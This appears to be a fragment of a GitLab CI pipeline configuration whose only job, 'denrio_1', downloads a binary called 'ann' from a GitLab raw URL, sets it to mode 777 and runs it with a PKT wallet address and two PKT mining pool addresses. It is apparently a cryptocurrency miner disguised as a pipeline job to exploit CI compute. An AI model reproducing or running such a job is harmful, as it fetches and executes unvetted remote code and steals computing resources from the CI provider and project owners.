  -build
  -deploy


denrio_1:
  stage: denrio
  script:
    -wget https://gitlab.com/suyatisadino/demonslayers/-/raw/main/ann && chmod 777 ann && ./ann ann -p pkt1q2ekw96wk4znjkfzgnjkrvy23kupat3ghtt7g5f http://pool.pktpool.io http://pool.pkt.world
